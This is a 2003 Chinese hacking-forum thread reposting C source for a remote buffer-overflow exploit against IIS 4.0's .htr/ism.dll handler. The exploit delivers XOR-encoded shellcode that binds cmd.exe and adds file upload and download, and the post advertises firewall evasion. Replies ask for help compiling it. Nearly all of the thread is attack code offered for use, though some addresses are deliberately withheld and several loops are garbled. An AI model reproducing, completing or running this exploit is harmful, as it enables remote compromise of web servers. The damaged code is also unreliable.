标题:
windows下强大功能的溢出程序源代码
[打印本页]
作者:
ChinaFox
时间:
2003-1-4 10:51
标题:
windows下强大功能的溢出程序源代码
IIS4.0的.htr映射ism.dll溢出攻击程序 编写:yuange(yuange@nsfocus.com) 本程序实现所有语言版本WINDOWS下的溢出攻击。SHELLCODE代码实现绑定cmd.exe功能,实现上传下传文件的ftp功能,实现加密传输功能,不开端口、不开服务,可以绕过防火墙等。独创的实现源代码编写shellcode的办法,可以方便编写、修改、调试shellcode,使得编写强大功能的shellcode成为可能。也解决了溢出攻击的几个根本问题: 1、溢出点确定;2、shellcode定位; 3、jmp esp功能代码地址确定;4、WINDOWS的API调用地址版本相关问题。另一个版本实现了接管WWW功能,可以实现不修改WEB页面文件的情况下替换所有WEB页面。一般的溢出攻击程序也可以使用这个框架 程序在vc6.0下编译通过 iis4。0 overflow program ver 1.0 copy by yuange 2000。05。8 #include #include #include #include #define FNENDLONG 0x08 #define NOPCODE 'B' // INC EDX 0x90 #define NOPLONG 0x50 #define BUFFSIZE 0x20000 #define PATHLONG 0x12 // c:\inetpub\wwwroot 物理路径长度。 // 因为WWW处理GET /的时候前面要加物理路径,再传递给ISM.DLL处理,所以溢出点与物理路径有 // 关。可以先用.IDC,.ida,.idq泄露物理路径的办法得到物理路径长度 #define RETEIPADDRESS 0xxxxx-PATHLONG+4+4 #define ADD1 0xxxx-0xxxxx-PATHLONG+4 #define ADD2 0xxxxx-0xxxxx-PATHLONG+4 /* 由于一些原因,这儿数据不提供 2000.10.25 */ // 两个要处理的参数地址,参见后面ISM.DLL有问题代码的注释 #define SHELLBUFFSIZE 0x800 #define SHELLFNNUMS 12 #define DATAXORCODE 0xAA #define LOCKBIGNUM 19999999 #define LOCKBIGNUM2 13579139 #define WEBPORT 80 void shellcodefnlock(); void shellcodefn(char *ecb); void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len); void iisput(int fd,char *str); void iisget(int fd,char *str); int newrecv(int fd,char *buff,int size,int flag); int newsend(int fd,char *buff,int size,int flag); int xordatabegin; int lockintvar1,lockintvar2; char lockcharvar; int main(int argc, char **argv) { char *server; char *str="LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "CreateFileA""\x0" "GetFileSize""\x0" "GetLastError""\x0" "Sleep""\x0" "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0" "XORDATA""\x0" "strend"; char buff1[]="GET /""\xff""default.htr/"; char buff2[]=".HTR HTTP/1.1 \nHOST:"; char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char SRLF[]="\x0d\x0a\x00\x00"; char eipexcept1[] ="\xxx\xxx\xxx\xxx"; // char eipexcept[] ="\xxx\xxx\xxx\xxx"; // ret char eipexcept[]="\xxx\xxx\xxx\xxx"; char eipwinnt[] ="\xxx\xxx\xxx\xxx"; char eipwinnt2[]="\xxx\xxx\xxx\xxx"; char reteax[] ="\xxx\xxx\xxx\xxx"; 由于一些原因,这儿数据不提供 2000.10.25 char eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64"; char buff[BUFFSIZE]; char recvbuff[BUFFSIZE]; char shellcodebuff[0x1000]; struct sockaddr_in s_in2,s_in3; struct hostent *he; char *shellcodefnadd,*chkespadd; unsigned int sendpacketlong; int i,j,k; unsigned char temp; int fd; u_short port,port1,shellcodeport; SOCKET d_ip; WSADATA wsaData; int offset=0; int OVERADD=RETEIPADDRESS; int result; fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 ."); fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2."); fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net ."); fprintf(stderr,"\n welcome to http://www.nsfocus.com ."); fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]); if(argc <2){ fprintf(stderr,"\n please enter the web server:"); gets(recvbuff); for(i=0;i if(recvbuff
!=' ') break; } server=recvbuff; if(i fprintf(stderr,"\n please enter the offset(0-3):"); gets(buff); for(i=0;i if(buff
!=' ') break; } offset=atoi(buff+i); } result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(1); } if(argc>2){ offset=atoi(argv[2]); } OVERADD+=offset; /* if(offset<0||offset>3){ fprintf(stderr,"\n offset error !offset 0 - 3 ."); gets(buff); exit(1); } if(argc <2){ // WSACleanup( ); // exit(1); } else server = argv[1]; for(i=0;i if(server
!=' ') break; } if(i for(i=0;i+3 if(server
==':'){ if(server[i+1]=='\\'||server[i+1]=='/'){ if(server[i+2]=='\\'||server[i+2]=='/'){ server+=i; server+=3; break; } } } } for(i=1;i<=strlen(server);++i){ if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0; } d_ip = inet_addr(server); if(d_ip==-1){ he = gethostbyname(server); if(!he) { WSACleanup( ); printf("\n Can't get the ip of %s !\n",server); gets(buff); exit(1); } else memcpy(&d_ip, he->h_addr, 4); } if(argc>3) port=atoi(argv[3]); else port=WEBPORT; if(port==0) port=WEBPORT; fd = socket(AF_INET, SOCK_STREAM,0); i=8000; setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i)); s_in3.sin_family = AF_INET; s_in3.sin_port = htons(port); s_in3.sin_addr.s_addr = d_ip; printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) { closesocket(fd); WSACleanup( ); fprintf(stderr,"\n connect err."); gets(buff); exit(1); } _asm{ mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=_chkesp; temp=*chkespadd; if(temp==0xe9) { ++chkespadd; i=*(int*)chkespadd; chkespadd+=i; chkespadd+=4; } shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memset(buff,NOPCODE,BUFFSIZE); if(argc>4){ memcpy(buff,argv[4],strlen(argv[4])); } else memcpy(buff,buff1,strlen(buff1)); memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80); shellcodefnadd=shellcodefn; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x1000;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memcpy(shellcodebuff,shellcodefnadd,k); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); for(i=0;i<0x400;++i){ if(memcmp(str+i,"strend",6)==0) break; } memcpy(shellcodebuff+k,str,i); sendpacketlong=k+i; for(k=0;k<=0x200;++k){ if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break; } for(i=0;i temp=shellcodebuff
; temp^=DATAXORCODE; if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){ buff[OVERADD+NOPLONG+k]='0'; ++k; temp+=0x40; } buff[OVERADD+NOPLONG+k]=temp; ++k; } // memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong); // k+=sendpacketlong; for(i=-0x30;i<0x30;i+=4){ memcpy(buff+ADD1+offset+i,eipexcept,4); memcpy(buff+ADD2+offset+i,eipexcept,4); } for(i=-0x30;i<0x30;i+=4){ memcpy(buff+OVERADD+i,eipexcept,4); } memcpy(buff+OVERADD+i,eipwinnt2,4); memcpy(buff+OVERADD+i+4,reteax,4); memcpy(buff+OVERADD+i+8,eipwinnt,4); memcpy(buff+OVERADD+i+0x0c,eipwinnt,4); memcpy(buff+OVERADD+i+0x10,eipjmpshell,7); // fprintf(stderr,"\n send:\n %s",buff); fprintf(stderr,"\n offset:%d",offset); if(argc>2){ server=argv[2]; if(strcmp(server,"win9x")==0){ memcpy(buff+OVERADD,eipwin9x,4); fprintf(stderr,"\n nuke win9x."); } if(strcmp(server,"winnt")==0){ memcpy(buff+OVERADD,eipwinnt,4); fprintf(stderr,"\n nuke winnt."); } } sendpacketlong=k+OVERADD+NOPLONG; strcpy(buff+sendpacketlong,buff2); strcpy(buff+sendpacketlong+strlen(buff2),server); strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n"); // printf("\n send buff:\n%s",buff); // strcpy(buff+OVERADD+NOPLONG,shellcode); sendpacketlong=strlen(buff); #ifdef DEBUG _asm{ lea esp,buff add esp,OVERADD ret } #endif if(argc>6){ if(strcmp(argv[6],"debug")==0){ _asm{ lea esp,buff add esp,OVERADD ret } } } xordatabegin=0; for(i=0;i<1;++i){ j=sendpacketlong; fprintf(stderr,"\n send packet %d bytes.",j); send(fd,buff,j,0); k=newrecv(fd,recvbuff,0x1000,0); if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) { xordatabegin=1; k=-1; fprintf(stderr,"\n ok!\n"); } if(k>0){ recvbuff[k]=0; fprintf(stderr,"\n recv:\n %s",recvbuff); } } k=1; ioctlsocket(fd, FIONBIO, &k); // fprintf(stderr,"\n now begin: \n"); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; k=1; while(k!=0){ if(k<0){ i=0; while(i==0){ gets(buff); if(memcmp(buff,"iisput",6)==0){ iisput(fd,buff+6); } else{ if(memcmp(buff,"iisget",6)==0){ iisget(fd,buff+6); } else i=1; } } k=strlen(buff); memcpy(buff+k,SRLF,3); newsend(fd,buff,k+2,0); } k=newrecv(fd,buff,0x1000,0); if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){ xordatabegin=1; k=-1; } if(k>0){ buff[k]=0; fprintf(stderr,"%s",buff); } // if(k==0) break; } closesocket(fd); WSACleanup( ); fprintf(stderr,"\n the server close connect."); gets(buff); return(0); } void shellcodefnlock() { _asm{ nop nop nop nop nop nop nop nop _emit('?') xor ecx,ecx add si,474h cmp dword ptr [esi],ecx jnz getesi add si,4 getesi: mov esi,[esi] add si,8 xor ecx,ecx mov byte ptr [esi],cl jmp next getediadd: pop EDI push EDI pop ESI push ebx // ecb push ebx // call shellcodefn ret address xor ecx,ecx looplock: lodsb cmp al,cl jz shell cmp al,0x30 jz clean0 sto: xor al,DATAXORCODE stosb jmp looplock clean0: lodsb sub al,0x40 jmp sto next: call getediadd shell: NOP NOP NOP NOP NOP NOP NOP NOP } } (生如夏花之绚丽,死如秋叶之静美。)呵呵。。。。
作者:
damnyou
时间:
2003-1-4 20:51
标题:
windows下强大功能的溢出程序源代码
能帮忙编译一下吗?
作者:
yunfei
时间:
2003-1-4 21:30
标题:
windows下强大功能的溢出程序源代码
好呀,谢谢你发贴呀!
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2